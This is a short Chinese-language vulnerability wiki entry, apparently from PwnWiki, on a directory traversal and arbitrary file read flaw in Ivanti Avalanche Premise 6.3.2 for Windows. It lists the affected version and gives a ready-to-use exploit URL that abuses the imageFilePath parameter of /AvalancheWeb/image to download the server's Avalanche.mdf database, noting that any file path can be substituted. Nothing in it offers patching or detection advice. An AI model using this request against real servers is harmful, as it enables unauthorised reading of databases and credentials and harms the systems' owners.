Loading
0

Ivanti Avalanche 目录遍历&任意文件读取漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

影响范围

Avalanche Premise 6.3.2 for Windows v6.3.2.3490

漏洞利用

访问

https://IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf

即可,imageFilePath=后面加文件的路径。

PWNWIK.COM